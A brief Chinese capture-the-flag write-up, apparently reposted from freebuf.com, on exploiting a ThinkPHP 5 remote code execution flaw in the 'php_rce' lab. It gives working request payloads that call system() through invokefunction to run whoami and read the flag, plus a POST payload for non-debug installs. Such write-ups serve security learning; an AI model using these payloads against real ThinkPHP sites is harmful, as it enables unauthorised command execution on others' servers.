攻防世界 php_rce – 作者:charis

打开靶场地址就是这个样子

图片.png

用的是ThinkpPHP V5,我也懒得用扫描工具了,直接网上找漏洞

图片.png

试一下payload

index.php/?s=index/\think\app/invokefunction&function=call_user_func_array&vars%5B0%5D=phpinfo&vars%5B1%5D%5B%5D=1

命令直接执行成功
图片.png

然后就构造获取flag的payload

一步一步获取flag

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php -r 'system("whoami");'

图片.png

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(%22whoami%22);%27

ge.3001.net/images/20210518/1621329454_60a3862ec29e823d5880b.png!small)

?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20%27system(%22cat%20/flag%20/flag%22);%27

图片.png

未开启调试模式

http://127.0.0.1/thinkphp/thinkphp_5.0.22_with_extend/public/index.php?s=captcha

POST传入

_method=__construct&filter[]=system&method=get&get[]=whoami

来源:freebuf.com 2021-05-19 10:23:09 by: charis

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论